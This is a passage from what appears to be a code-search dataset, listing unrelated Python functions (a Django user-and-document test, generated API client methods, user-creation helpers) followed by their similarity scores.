header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='TestExecutionResult',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def test_modify(modify_requests):\n # 先创建用户\n admin1 = User(username=\"admin1\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"123456\", is_admin=True, query_json=\"\")\n admin2 = User(username=\"admin2\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"456789\", is_admin=True, query_json=\"\")\n admin3 = User(username=\"admin3\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"456789\", is_admin=True, query_json=\"\")\n user1 = User(username=\"user1\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"123456\", is_admin=False, query_json=\"\")\n user2 = User(username=\"user2\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"0987654\", is_admin=False, query_json=\"\")\n # user3 = User(username=\"user3\", 
email=\"CodeDance@mails.tsinghua.edu.cn\",\n # password=\"qwerty\", is_admin=False, query_json=\"\")\n\n for user in [admin1, admin2, admin3, user1, user2]:\n user.full_clean()\n user.save()\n # 再创建文档\n document_exist_1 = Document(id=1, content=\"高温超导(High-temperature superconductivity,High Tc)\\\n 是一种物理现象,指一些具有较其他超导物质相对较高的临界温度的物质在液态氮的环境下产生的超导现象。\",\n status=0, title=\"超导现象\", src=0)\n document_exist_2 = Document(id=2, content=\"2020年新西兰大选(英语:2020 New Zealand general election),\\\n 即第53届新西兰国会选举于该年10月17日举行[1]。本届选举为新西兰自1996年采用混合议员比例代表制(联立单一选区两票制)\\\n 以来的第八次选举。此次大选与有关大麻和安乐死合法化的两个公投一并进行。结果工党取得过半数议席,有权单独执政,\\\n 为现有选举制度开始实施至今的首次。[2]\", status=0, title=\"新西兰大选\", src=0)\n document_exist_3 = Document(id=3, content=\"永州之野产异蛇,黑质而白章,触草木尽死。以啮人,无御之者。然得而腊之以为饵,\\\n 可以已大风、挛、瘘、疠,去死肌,杀三虫。其始,太医以王命聚之,岁赋其二,募有能捕之者,当其租入,永之人争奔走焉。\\\n 有蒋氏者,专其利三世矣。问之,则曰:“吾祖死于是,吾父死于是,今吾嗣为之十二年,几死者数矣。”言之,貌若甚戚者。\\\n 余〈杰按:通“予”,下同。〉悲之,且曰:“若毒之乎?余将告于莅是者,更若役,复若赋,则何如?”蒋氏大戚,\\\n 汪然出涕曰:“君将哀而生之乎?则吾斯役之不幸,未若复吾赋不幸之甚也。向吾不为斯役,则久已病矣。\\\n 自吾氏三世居是乡,积于今六十岁矣,而乡邻之生日蹙。殚其地之出,竭其庐之入,号呼而转徙,饥渴而顿踣,\\\n 触风雨,犯寒暑,呼嘘毒疠,往往而死者相藉也。曩与吾祖居者,今其室十无一焉;与吾父居者,今其室十无二三焉;\\\n 与吾居十二年者,今其室十无四五焉,非死即徙尔。而吾以捕蛇独存。悍吏之吾乡,叫嚣乎东西,隳突乎南北,哗然而骇者,虽鸡狗不得宁焉。\\\n 吾恂恂而起,视其缶,而吾蛇尚存,则弛然而卧。谨食之,时而献焉。退而甘食其土之有,以尽吾齿。盖一岁之犯死者二焉,其馀则熙熙而乐,\\\n 岂若吾乡邻之旦旦有是哉!今虽死乎此,比吾乡邻之则已后矣,又安敢毒耶?”余闻而愈悲。孔子曰:“苛政猛于虎也。”吾尝疑乎是,今以蒋氏观之,\\\n 犹信。呜呼!孰知赋敛之毒,有甚是蛇者乎!故为之说,以俟夫观人风者得焉。\", status=0, title=\"捕蛇者说\", src=0)\n document_deleted_4 = Document(id=4, content=\"采薇采薇,薇亦作止。曰归曰归,岁亦莫止。靡室靡家,玁狁之故。不遑启居,玁狁之故。\\\n 采薇采薇,薇亦柔止。曰归曰归,心亦忧止。忧心烈烈,载饥载渴。我戍未定,靡使归聘。\\\n 采薇采薇,薇亦刚止。曰归曰归,岁亦阳止。王事靡盬,不遑启处。忧心孔疚,我行不来!\\\n 彼尔维何?维常之华。彼路斯何?君子之车。戎车既驾,四牡业业。岂敢定居?一月三捷。\\\n 驾彼四牡,四牡骙骙。君子所依,小人所腓。四牡翼翼,象弭鱼服。岂不日戒?玁狁孔棘!\\\n 昔我往矣,杨柳依依。今我来思,雨雪霏霏。行道迟迟,载渴载饥。我心伤悲,莫知我哀!\", status=1, title=\"采薇\", src=0)\n document_deleted_5 = Document(id=5, content=\"氓之蚩蚩,抱布贸丝。匪来贸丝,来即我谋。\\\n 送子涉淇,至于顿丘。匪我愆期,子无良媒。将子无怒,秋以为期。\\\n  乘彼垝垣,以望复关。不见复关,泣涕涟涟。既见复关,载笑载言。尔卜尔筮,体无咎言。以尔车来,以我贿迁。\\\n  桑之未落,其叶沃若。于嗟鸠兮,无食桑葚!于嗟女兮,无与士耽!士之耽兮,犹可说也。女之耽兮,不可说也。\\\n  桑之落矣,其黄而陨。自我徂尔,三岁食贫。淇水汤汤,渐车帷裳。女也不爽,士贰其行。士也罔极,二三其德。\\\n  三岁为妇,靡室劳矣;夙兴夜寐,靡有朝矣。言既遂矣,至于暴矣。兄弟不知,咥其笑矣。静言思之,躬自悼矣。\\\n  及尔偕老,老使我怨。淇则有岸,隰则有泮。总角之宴,言笑晏晏。信誓旦旦,不思其反。反是不思,亦已焉哉!\", status=1, title=\"氓\", src=0)\n\n for document in [document_exist_1, document_exist_2, document_exist_3,\n document_deleted_4, document_deleted_5]:\n document.full_clean()\n document.save()\n\n for request in modify_requests:\n response = modify(request[\"request\"])\n assert response.status_code == request[\"response\"][\"code\"]\n # assert json.loads(response.content)[\"data\"].startswith(request[\"response\"][\"data\"])", "def Board_create(objPoints, dictionary, ids):\n pass", "def post_integrations_action_draft_publish(self, action_id, body, **kwargs):\n\n all_params = ['action_id', 'body']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method post_integrations_action_draft_publish\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'action_id' is set\n if ('action_id' not in params) or (params['action_id'] is None):\n raise ValueError(\"Missing the required parameter `action_id` when calling `post_integrations_action_draft_publish`\")\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `post_integrations_action_draft_publish`\")\n\n\n resource_path = 
'/api/v2/integrations/actions/{actionId}/draft/publish'.replace('{format}', 'json')\n path_params = {}\n if 'action_id' in params:\n path_params['actionId'] = params['action_id']\n\n query_params = {}\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='Action',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def setUp(self) -> None:\n super().setUp()\n\n user_models.UserBulkEmailsModel(id=self.USER_ID_1).put()\n user_models.UserBulkEmailsModel(id=self.USER_ID_2, deleted=True).put()", "def test_create_user_wrong_type(self):\n\n data = {\n \"firstname\": \"John\",\n \"lastname\": \"Doe\",\n \"password\": \"supersecret\",\n \"password_repeat\": \"supersecret\",\n }\n\n for item in [\"firstname\", \"lastname\", \"password\", \"password_repeat\"]:\n data_copy = copy(data)\n data_copy[item] = 1234\n res = self.post(url=\"/users\", data=data_copy)\n self.assertException(res, exc.WrongType)\n\n users = User.query.all()\n self.assertEqual(len(users), 5)", "def test_collective_users_submits(self):\r\n\r\n # 1.\r\n users_state = self._get_users_state()\r\n\r\n self.assertEqual(\r\n ''.join(set([\r\n content['status']\r\n for _, content in users_state.items()\r\n ])),\r\n 'success')\r\n\r\n # 2.\r\n # Invcemental state per user.\r\n users_state_after_post = self._post_words(['word1', 'word2'])\r\n\r\n self.assertEqual(\r\n ''.join(set([\r\n content['status']\r\n for _, content in users_state_after_post.items()\r\n ])),\r\n 'success')\r\n\r\n # Final state after all posts.\r\n users_state_before_fail = self._get_users_state()\r\n\r\n # 3.\r\n users_state_after_post = self._post_words(\r\n ['word1', 'word2', 'word3'])\r\n\r\n self.assertEqual(\r\n ''.join(set([\r\n content['status']\r\n for _, content in users_state_after_post.items()\r\n ])),\r\n 'fail')\r\n\r\n # 4.\r\n current_users_state = self._get_users_state()\r\n self._check_response(users_state_before_fail, current_users_state)", "def user_batch():\n return [\n UserFactory(roles=RoleFactory.create_batch(randint(0, 3)))\n for _ in range(randint(3, 5))\n ]", "def __createFields(self):\n fields = self.updateFields\n for field in fields:\n self.__createField(field)", "def batch_transfer(self):\n ticket_range = self.zendesk.ticket_range()\n for i in range(1, ticket_range):\n tickets = self.zendesk.get_list_of_tickets(i)\n for ticket in tickets[\"tickets\"]:\n ticket_id = ticket[\"id\"]\n self.transfer_ticket(ticket_id)", "def seed_all():\n seed_client()\n seed_staff()\n seed_request()\n seed_comment()", "def create_user_batch(self, email, first_name, last_name,\n pms=False, tms=False, rvs=False,\n welcome_email=False):\n user = self.create_user(\n email=email,\n password=self.make_random_password(),\n first_name=first_name,\n last_name=last_name)\n\n if pms:\n user.assessment_pms.add(*pms)\n\n if tms:\n user.assessment_teams.add(*tms)\n\n if 
rvs:\n user.assessment_reviewers.add(*rvs)\n\n if welcome_email:\n user.send_welcome_email()", "def create(self, data):\n data.pop('password_confirmation')\n try:\n availability = data.pop(\"availability\")\n babysitter = data.pop(\"user_bbs\")\n user = User.objects.create_user(**data, is_verified=False)\n if babysitter:\n bbs = Babysitter.objects.create(user_bbs=user, **babysitter)\n for shift in availability:\n Availability.objects.create(bbs=bbs, **shift)\n except KeyError:\n logging.info('This is a instance client')\n user = User.objects.create_user(**data, is_verified=False)\n logging.info(f'User created, whit pk {user.pk}')\n client = Client.objects.create(user_client=user)\n logging.info(f'User pk is already to pass {user.pk}')\n send_confirmation_email.delay(username=user.username, email=user.email )\n return user", "def _post_draft_message(request, draft):\n if draft is None:\n draft = models.Message(\n issue_key=request.issue.key, parent=request.issue.key,\n sender=request.user.email(), draft=True)\n draft.text = request.POST.get('reviewmsg')\n draft.put()\n return HttpTextResponse(draft.text)", "def get_integrations_actions_drafts(self, **kwargs):\n\n all_params = ['page_size', 'page_number', 'next_page', 'previous_page', 'sort_by', 'sort_order', 'category', 'name', 'secure', 'include_auth_actions']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_integrations_actions_drafts\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n\n resource_path = '/api/v2/integrations/actions/drafts'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'page_size' in params:\n query_params['pageSize'] = params['page_size']\n if 'page_number' in params:\n query_params['pageNumber'] = params['page_number']\n if 'next_page' in params:\n query_params['nextPage'] = params['next_page']\n if 'previous_page' in params:\n query_params['previousPage'] = params['previous_page']\n if 'sort_by' in params:\n query_params['sortBy'] = params['sort_by']\n if 'sort_order' in params:\n query_params['sortOrder'] = params['sort_order']\n if 'category' in params:\n query_params['category'] = params['category']\n if 'name' in params:\n query_params['name'] = params['name']\n if 'secure' in params:\n query_params['secure'] = params['secure']\n if 'include_auth_actions' in params:\n query_params['includeAuthActions'] = params['include_auth_actions']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='ActionEntityListing',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response" ]
[ "0.56473714", "0.55276287", "0.5469983", "0.5152256", "0.5134393", "0.5032918", "0.4999463", "0.49490035", "0.49176887", "0.49063164", "0.48992178", "0.48911917", "0.48814285", "0.48810473", "0.48643064", "0.48627475", "0.48573655", "0.48487023", "0.48398086", "0.48395732", "0.47892275", "0.47678792", "0.47663376", "0.47654828", "0.47591096", "0.47496137", "0.47379512", "0.4734019", "0.47167554", "0.470971", "0.4699241", "0.46818334", "0.46818247", "0.46738422", "0.46677288", "0.46614414", "0.46570012", "0.46464014", "0.46352196", "0.46109182", "0.46088654", "0.46063933", "0.4587543", "0.45742354", "0.45688087", "0.45681214", "0.4550345", "0.45463353", "0.45437443", "0.453122", "0.45309478", "0.4528985", "0.45206273", "0.45179492", "0.4506122", "0.4481116", "0.4461353", "0.44601384", "0.44594777", "0.44545907", "0.44354975", "0.44296935", "0.44274187", "0.4425626", "0.4414628", "0.44111487", "0.44101024", "0.44027638", "0.44003233", "0.4395836", "0.43931785", "0.43901214", "0.43753543", "0.43724817", "0.43628758", "0.4358713", "0.43575794", "0.43393183", "0.43276587", "0.43267816", "0.43261", "0.4318033", "0.43171448", "0.43159336", "0.43156177", "0.431395", "0.43131655", "0.43101948", "0.4309236", "0.430473", "0.430186", "0.42951035", "0.42924568", "0.42898947", "0.4285889", "0.42856336", "0.42845896", "0.42792395", "0.42759982", "0.42748168" ]
0.7956114
0
Edit/update a single draft for a given user. Since the only place this method is used (apart from tests) is the edit_draft view, we assume that the draft_dict is syntactically valid (i.e. it satisfies the draft_dict_validator).
def do_edit_draft(draft_id: int, draft_dict: Dict[str, Any], user_profile: UserProfile) -> None:\n    try:\n        draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n    except Draft.DoesNotExist:\n        raise ResourceNotFoundError(_("Draft does not exist"))\n\n    valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n    draft_object.content = valid_draft_dict["content"]\n    draft_object.topic = valid_draft_dict["topic"]\n    draft_object.recipient_id = valid_draft_dict["recipient_id"]\n    draft_object.last_edit_time = valid_draft_dict["last_edit_time"]\n    draft_object.save()\n\n    event = {"type": "drafts", "op": "update", "draft": draft_object.to_dict()}\n    send_event(user_profile.realm, event, [user_profile.id])
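The docstring above states that this helper is only called from the edit_draft view. A minimal caller sketch under that assumption follows — the view name comes from the docstring, but the request parsing, JsonResponse, and payload shape are illustrative assumptions, not part of this row; UserProfile and do_edit_draft are the names from the document itself.

import json
from typing import Any, Dict

from django.http import HttpRequest, HttpResponse, JsonResponse


def edit_draft(request: HttpRequest, user_profile: UserProfile, draft_id: int) -> HttpResponse:
    # Assumed payload shape; per the docstring, draft_dict has already
    # satisfied draft_dict_validator upstream, so it is passed through as-is.
    draft_dict: Dict[str, Any] = json.loads(request.body)["draft"]
    do_edit_draft(draft_id, draft_dict, user_profile)
    return JsonResponse({"result": "success"})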
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def edit_draft(self):\r\n EmptyPromise(\r\n lambda: self.q(css='.create-draft').present,\r\n 'Wait for edit draft link to be present'\r\n ).fulfill()\r\n\r\n self.q(css='.create-draft').first.click()\r\n\r\n EmptyPromise(\r\n lambda: self.q(css='.editing-draft-alert').present,\r\n 'Wait for draft mode to be activated'\r\n ).fulfill()", "def edit_user(user_id):\n\n db_user = User.query.get_or_404(user_id)\n\n return render_template(\"edit_user.html\",\n headline=f\"Edit Blogly {db_user.get_full_name()}\",\n user=db_user)", "def edit(user_id):\n if user_id != current_user.id:\n return abort(403)\n\n user = get_user(user_id)\n form = EditForm(obj=user)\n form.email.data = user.email\n\n if form.validate_on_submit():\n password = form.password.data\n username = form.username.data\n\n save_result = edit_user(user_id, password, username, user.active)\n user = save_result['entry']\n form = EditForm(request.form, obj=save_result['entry'])\n form.email.data = user.email\n return redirect(url_for('.index'))\n \n return render_template('users/edit.html'\n ,form=form\n ,user=user\n ,t=t\n ,m=m)", "def edit_user(user_id):\n user = User.query.get_or_404(user_id)\n return render_template('/users/edit_page.html', user=user)", "def edit_user(user_id):\n\n user = User.query.get_or_404(user_id)\n return render_template('users/edit.html', user=user)", "def put(self, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n self.validate_input(d, draft_id)\n self.process_input(d, draft_id)\n d.save()", "def edit_user(user_id):\n user = User.query.get_or_404(user_id)\n\n return render_template('edit-user.html', user=user)", "def update(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('update',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def further_validated_draft_dict(\n draft_dict: Dict[str, Any], user_profile: UserProfile\n) -> Dict[str, Any]:\n\n content = normalize_body(draft_dict[\"content\"])\n\n timestamp = draft_dict.get(\"timestamp\", time.time())\n timestamp = round(timestamp, 6)\n if timestamp < 0:\n # While it's not exactly an invalid timestamp, it's not something\n # we want to allow either.\n raise JsonableError(_(\"Timestamp must not be negative.\"))\n last_edit_time = timestamp_to_datetime(timestamp)\n\n topic = \"\"\n recipient_id = None\n to = draft_dict[\"to\"]\n if draft_dict[\"type\"] == \"stream\":\n topic = truncate_topic(draft_dict[\"topic\"])\n if \"\\0\" in topic:\n raise JsonableError(_(\"Topic must not contain null bytes\"))\n if len(to) != 1:\n raise JsonableError(_(\"Must specify exactly 1 stream ID for stream messages\"))\n stream, sub = access_stream_by_id(user_profile, to[0])\n recipient_id = stream.recipient_id\n elif draft_dict[\"type\"] == \"private\" and len(to) != 0:\n to_users = get_user_profiles_by_ids(set(to), user_profile.realm)\n try:\n recipient_id = recipient_for_user_profiles(to_users, False, None, user_profile).id\n except ValidationError as e: # nocoverage\n raise JsonableError(e.messages[0])\n\n return {\n \"recipient_id\": recipient_id,\n \"topic\": topic,\n \"content\": content,\n \"last_edit_time\": last_edit_time,\n }", "def edit_draft(self, message_id):\n return Draft(self, message_id).fetch()", "def show_edit_form(user_id):\n user = User.query.get_or_404(user_id)\n return render_template('edit.html', user=user)", "def edit_user(user_id):\n user = User.query.get_or_404(user_id)\n return render_template(\"users/edit_user.html\", user=user)", "def show_edit_form(user_id):\n\n user = 
User.query.get_or_404(user_id)\n\n return render_template(\"users/edit_user.html\", user=user)", "def put(self, user_id):\r\n return update_user(request, user_id)", "def test_update_draft():\n with open(basedir + \"fixture/7149593_formatted.json\", \"r\") as f:\n data = f.read()\n storage.save_draft(user_id, \"bib\", \"7149593\", data, \"1362044230872\")\n json_data = json.loads(data)\n json_data['@context'] = \"yadda\"\n storage.update_draft(user_id, \"bib\", \"7149593\", json.dumps(json_data), \"1362044230872\")\n assert json.loads(open(basedir + \"some/path/\" + user_id + \"/bib/7149593\", \"r\").read())['document']['@context'] == \"yadda\"", "def allow_to_edit(user):\n return allow_to_edit_well(user)", "def show_edit_user_form(user_id):\n\n user = User.query.get_or_404(user_id)\n return render_template('edit_user.html', user=user)", "def update( self, trans, id, payload, **kwd ):\n current_user = trans.user\n user_to_update = self.user_manager.by_id( self.decode_id( id ) )\n\n # only allow updating other users if they're admin\n editing_someone_else = current_user != user_to_update\n is_admin = trans.api_inherit_admin or self.user_manager.is_admin( current_user )\n if editing_someone_else and not is_admin:\n raise exceptions.InsufficientPermissionsException( 'you are not allowed to update that user', id=id )\n\n self.user_deserializer.deserialize( user_to_update, payload, user=current_user, trans=trans )\n return self.user_serializer.serialize_to_view( user_to_update, view='detailed' )", "def show_edit_user_form(user_id):\r\n user = User.query.get_or_404(user_id)\r\n\r\n return render_template('edit-user.html', user=user)", "def patch(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('patch',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def get_draft_by_id(request, draft_id):\n\n for draft in request.session[\"drafts\"]:\n if draft[\"id\"] == draft_id:\n # Found a valid draft, return it\n return draft\n\n return None # Otherwise return None.", "def put(self, user_id):\n data = request.json\n return update_user(data, user_id)", "def edit_post(post_id):\n\n post_data = {\"id\": post_id}\n db_post = Post.query.get_or_404(post_id)\n post_data[\"title\"] = db_post.title\n post_data[\"content\"] = db_post.content\n post_data[\"user_id\"] = db_post.user_id\n\n return render_template(\"edit_post.html\", headline=\"Add New Blogly User\", post=post_data)", "def can_edit(self, user, user_is_admin=False):\r\n if user is None or isinstance(user, FakeAccount):\r\n return False\r\n elif user_is_admin or self.author_id == user._id:\r\n return True\r\n elif Subreddit._by_name('discussion').is_editor(user):\r\n return True\r\n else:\r\n return False", "def edit_user_process(user_id):\n\n # extract form data, edit, commit, then redirect to /users\n first_name = request.form[\"first-name\"].strip()\n last_name = request.form[\"last-name\"].strip()\n image_url = request.form[\"image-url\"].strip()\n\n msg = db_edit_user(user_id, first_name, last_name, image_url)\n\n flash(msg[\"text\"], msg[\"severity\"])\n\n return redirect(f\"/users/{user_id}\")", "def update(self, user: U) -> None:\n ...", "def commit_draft(draft_uuid):\n api_request('post', api_url('drafts', str(draft_uuid), 'commit'))", "def user_edit(request):\n DEBUG = False\n\n if not has_permission('editUser', request.context, request):\n #print \"NOT has_permission !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\"\n request.message = \"You do not have permissions to edit this user!\"\n raise HTTPForbidden\n\n # if no 
user_id in URL and not logged in, tell user to login\n\n try:\n user_id = request.matchdict['user_id']\n except KeyError, ke:\n #print ke\n return HTTPFound(location=request.route_url('not_found'))\n\n user = User.get_by_user_id(user_id)\n\n if user is None:\n msg = \"User was not founf in database.\"\n return HTTPFound(location=request.route_url('not_found'))\n\n form = Form(request, schema=UserSettingsSchema, obj=user)\n\n if 'form.submitted' in request.POST and not form.validate():\n # form didn't validate\n request.session.flash('Please check the form below for errors!')\n if DEBUG: # pragma: no cover\n print \"submitted but not validated!\"\n\n if 'form.submitted' in request.POST and form.validate():\n # ready for changing database entries!\n request.session.flash('form validated!')\n if DEBUG: # pragma: no cover\n print \"the form was submitted and validated.\"\n\n if form.data['surname'] != user.surname:\n if DEBUG: # pragma: no cover\n request.session.flash('surname was not same --> changing')\n print \"changing surname\"\n user.surname = form.data['surname']\n if form.data['lastname'] != user.lastname:\n if DEBUG: # pragma: no cover\n request.session.flash('lastname was not same --> changing')\n print \"changing lastname\"\n user.lastname = form.data['lastname']\n if form.data['email'] != user.email:\n request.session.flash('email was not same --> changing')\n user.email = form.data['email']\n if form.data['phone'] != user.phone:\n request.session.flash('phone was not same --> changing')\n user.phone = form.data['phone']\n if form.data['fax'] != user.fax:\n request.session.flash('fax was not same --> changing')\n user.fax = form.data['fax']\n if form.data['street'] != user.street:\n request.session.flash('street was not same --> changing')\n user.street = form.data['street']\n if form.data['number'] != user.number:\n request.session.flash('number was not same --> changing')\n user.number = form.data['number']\n if form.data['city'] != user.city:\n request.session.flash('city was not same --> changing')\n user.city = form.data['city']\n if form.data['postcode'] != user.postcode:\n request.session.flash('postcode was not same --> changing')\n user.postcode = form.data['postcode']\n if form.data['country'] != user.country:\n request.session.flash('country was not same --> changing')\n user.country = form.data['country']\n\n if DEBUG: # pragma: no cover\n print \"returning the form\"\n return {\n 'the_user_id': user_id,\n 'the_username': user.username,\n 'form': FormRenderer(form),\n }", "def edit(ctx, docid, password):\n coll = db.get_document_collection(ctx)\n config = ctx.obj[\"config\"]\n\n doc, docid = db.get_document_by_id(ctx, docid)\n title = doc[\"title\"]\n\n template, c = db.get_content(ctx, doc, password=password)\n\n content, tmpfile = utils.get_content_from_editor(config[\"editor\"], template=template)\n d = datetime.datetime.now()\n\n if doc[\"encrypted\"] is True:\n title = utils.get_title_from_content(content)\n content = c.encrypt_content(content.decode(\"utf-8\").encode(\"utf-8\"))\n else:\n if not \"links\" in doc[\"categories\"]:\n title = utils.get_title_from_content(content)\n\n if isinstance(template, unicode):\n content = content.decode(\"utf-8\")\n\n if content != template:\n doc[\"content\"] = content\n doc[\"title\"] = title\n doc[\"updated\"] = d\n if validate(doc):\n coll.save(doc)\n else:\n utils.log_error(\"Validation of the updated object did not succeed\")\n\n transaction.log(ctx, docid, \"edit\", title)\n utils.log_info(\"Document \\\"%s\\\" 
updated.\" % title)\n else:\n utils.log_info(\"No changes detected for \\\"%s\\\"\" % title)\n\n utils.clean_tmpfile(tmpfile)\n\n return True", "def update(id):\n if request.method == \"POST\":\n result = update_post(\n id,\n request.form[\"title\"],\n request.form[\"body\"]\n )\n flash(result)\n return redirect(url_for(\"show\"))\n else:\n post = get_post(id)\n return render_template(\"edit.html\", **post)", "def edit(request, pk):\n\n try:\n object = User.objects.get(pk=pk)\n except:\n object = User()\n\n if request.method == 'POST': # If the form has been submitted...\n form = UserForm(request.POST, instance=object)\n\n if form.is_valid(): # If the form is valid\n object = form.save()\n\n messages.success(request, _('The user has been saved.'))\n\n return redirect('users.views.list')\n else:\n form = UserForm(instance=object)\n\n return render(request, 'users/users/edit.html', {'form': form})", "def edit_user(user_id):\n\n if not g.user:\n flash(\"Access denied.\", \"danger\")\n\n user = g.user\n form = EditUserForm(obj=user)\n\n if form.validate_on_submit():\n if User.authenticate(user.username, form.password.data):\n user.username = form.username.data\n user.email = form.email.data\n user.location = form.location.data\n user.bio = form.bio.data\n user.image_url = form.image_url.data\n\n db.session.commit()\n return redirect(f\"/users/{user.id}\")\n\n flash(\"Invalid password, please try again\", 'danger')\n\n return render_template('/users/edit.html', form=form, user_id=user.id, user=user)", "def edit_entry(self, id, body=None, link=None, **args):\n args.update(id=id)\n if body: args.update(body=body)\n if link: args.update(link=link)\n return self.fetch(\"/entry\", post_args=args)", "def edit_show_user(user_id):\n edited_user = User.query.get_or_404(user_id)\n\n edited_user.first_name = request.form['first_name']\n edited_user.last_name = request.form['last_name']\n edited_user.image_url = request.form['image_url']\n\n db.session.add(edited_user)\n db.session.commit()\n\n return redirect('/')", "def show_edit_post_form(user_id, post_id):\n\n post = Post.query.get_or_404(post_id)\n user = post.user\n\n return render_template('edit_post.html', post=post, user=user)", "def edit(tesserae, tessera_id):\n try:\n return tesserae.edit(tessera_id)\n except TesseraError, e:\n sys.stderr.write(\"Error: %s\\n\", str(e))\n return False", "def do_delete_draft(draft_id: int, user_profile: UserProfile) -> None:\n try:\n draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n except Draft.DoesNotExist:\n raise ResourceNotFoundError(_(\"Draft does not exist\"))\n\n draft_id = draft_object.id\n draft_object.delete()\n\n event = {\"type\": \"drafts\", \"op\": \"remove\", \"draft_id\": draft_id}\n send_event(user_profile.realm, event, [user_profile.id])", "def update_user(self, user):\n query = TABELLE['id_users']['update']\n return self.execute(query,\n (user['admin'], user['tester'], user['loot_user'], user['loot_admin'], user['banned'],\n user['id']))", "def save_draft(self, review_request):\r\n self.api_call('api/review-requests/%s/draft/save/' %\r\n review_request['id'])\r\n self.debug('Review request draft saved')", "def process_post_edit(user_id, post_id):\n\n title = request.form.get('title')\n content = request.form.get('content')\n\n post = Post.query.get_or_404(post_id)\n\n post.title = title\n post.content = content\n\n db.session.add(post)\n db.session.commit()\n\n return redirect(f'/users/{user_id}/posts/{post_id}')", "def save_edit(request, post_id):\n if request.method 
== \"PUT\":\n data = json.loads(request.body)\n user = request.user\n post = Post.objects.get(id=post_id)\n content = data.get(\"content\", \"\")\n # Check to make sure user attempting edit is author\n if user == post.author:\n post.content = content\n post.save()\n return JsonResponse({\"content\": post.content})\n else:\n return JsonResponse({\"message\": \"Not authorized to edit\"})", "def edit_user(user_id):\n \"\"\"Cannot update a user's role\"\"\"\n db = get_db()\n users = db.users\n data = request.json\n \n # Check if user_id is a string\n if not isinstance(user_id, str):\n raise APIException(status_code=400, message='user_id not a string')\n \n # Check if user_id is actually an entry in the users collection\n cursor = users.find({\"user_id\": user_id})\n if cursor.count() is 0:\n raise APIException(status_code=404, message='user_id does not exist yet')\n elif cursor.count() > 1:\n raise APIException(status_code=500, message='Error, multiple entries with same user_id found. user_id must be unique')\n \n # Validate that the data matches the required format\n # user_id = data['user_id']\n # del data['user_id']\n validate_user_data(data, is_adding_new_user=False)\n # data['user_id'] = user_id\n\n result = users.update_one(\n {\"user_id\": user_id},\n {\n \"$set\": {\n \"name\": data[\"name\"],\n \"phone\": data[\"phone\"],\n \"email\": data[\"email\"],\n \"VenmoUsername\": data[\"VenmoUsername\"],\n \"gender\": data[\"gender\"],\n \"height\": data[\"height\"],\n \"weight\": data[\"weight\"],\n \"age\": data[\"age\"],\n \"bio\": data[\"bio\"],\n \"tags\": data[\"tags\"],\n \"location\": data[\"location\"],\n \"pic_url\": data[\"pic_url\"]\n }\n }\n )\n \n if \"role\" not in data:\n return '', 200\n if data[\"role\"] == \"Mentor\":\n result = users.update_one(\n {\"user_id\": user_id},\n {\n \"$set\": {\n \"rates\": data[\"rates\"],\n \"accepting_clients\": data[\"accepting_clients\"]\n }\n }\n )\n return '', 200", "def get_draft(draft_uuid):\n assert isinstance(draft_uuid, UUID)\n try:\n data = api_request('get', api_url('drafts', str(draft_uuid)))\n except NotFound:\n raise DraftNotFound(f\"Draft does not exist: {draft_uuid}\") # lint-amnesty, pylint: disable=raise-missing-from\n return _draft_from_response(data)", "def _edit_user(self):\n users = fileIO.load_json(\"users.json\")\n print(\"The list of users is as follows: \")\n for i in users:\n print(users[i][\"name\"])\n #List specific user's settings and get user id\n userID = self._list_user_settings(users)\n #Loop until valid option given\n option = False\n while not option:\n option = input(\"Please enter the setting you would like to change: \")\n if option not in users[userID]:\n option = False\n print(\"That setting is not valid.\")\n #Get input for new setting\n args = input(\"Please enter what you would like to change that setting to: \")\n #Output\n command = \"edit_user {0} {1} {2}\\r\\n\".format(userID, option, args)\n 